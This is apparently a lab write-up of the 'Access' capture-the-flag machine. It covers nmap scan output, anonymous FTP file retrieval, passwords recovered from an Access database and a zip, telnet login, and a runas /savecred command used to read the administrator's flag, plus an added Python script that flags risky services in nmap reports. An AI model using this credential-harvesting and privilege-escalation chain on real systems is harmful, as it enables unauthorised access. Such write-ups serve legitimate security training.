Access

OS: Windows, Difficulty: Easy, IP: 10.10.10.98

Initial Enumeration

# Nmap 7.70 scan initiated Thu Jul 25 23:30:51 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 21,23,80 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (90%), Microsoft Windows Vista SP2 (90%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (89%), Microsoft Windows 8.1 Update 1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   236.52 ms 10.10.14.1
2   247.52 ms 10.10.10.98

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 25 23:33:57 2019 -- 1 IP address (1 host up) scanned in 186.20 seconds

FTP had anonymous login enabled, so I got a few files from the FTP server. Files: 'Access Control.zip' and backup.mdb

From the backup.mdb file I got the auth_user data, which gave me the password for the engineer account, access4u@security. That let me unlock the 'Access Control.zip' file, which revealed the password for another account, security: 4Cc3ssC0ntr0ller

The security account had access to the telnet service, which got me a shell and the user flag.
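
The exposures visible in the scan above (anonymous FTP, telnet, HTTP TRACE) can be flagged automatically when reviewing nmap output for hosts you are responsible for. The following is an added example, not part of the original write-up; the rule names, remediation notes and the sample lines (constructed in the format of the scan above) are assumptions.

```python
import re

# Constructed sample: a few lines in nmap's normal (-oN) output format,
# modelled on the scan shown above.
SAMPLE = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Hypothetical rule set: (rule id, line kind it applies to, pattern, remediation)
RULES = [
    ("ftp-anonymous", "script", re.compile(r"ftp-anon: Anonymous FTP login allowed"),
     "disable anonymous authentication on the FTP site"),
    ("telnet-exposed", "service", re.compile(r"^telnet\??$"),
     "retire telnet or restrict it; credentials cross the wire in cleartext"),
    ("http-trace", "script", re.compile(r"risky methods:.*\bTRACE\b"),
     "disable the TRACE verb on the web server"),
]

def triage(report):
    """Return [(port, rule_id, remediation)] for open ports in an -oN report."""
    findings, port = [], None
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            # New port row; script lines that follow belong to it if it is open.
            port = int(m.group(1)) if m.group(3) == "open" else None
            kind, text = "service", m.group(4)
        elif line.startswith("|"):
            # NSE script output hangs under its port, prefixed "| " or "|_".
            kind, text = "script", line.lstrip("|_ ")
        else:
            port = None  # anything else ends the current port's context
            continue
        if port is not None:
            findings += [(port, rid, fix) for rid, k, pat, fix in RULES
                         if k == kind and pat.search(text)]
    return findings

if __name__ == "__main__":
    for port, rid, fix in triage(SAMPLE):
        print(f"{port}/tcp  {rid}: {fix}")
```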

User Own

C:\Users\security\Desktop>type user.txt                                    
ff1f3***

Root Own

C:\Users\Public>runas /savecred /user:ACCESS\Administrator "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\FLAG"
C:\Users\Public>type FLAG            
6e158***

Learning Outcome

This was a fun box; I was not aware of the runas tool and its savecred flag. Also, I learned how to handle MS Access files on Linux.
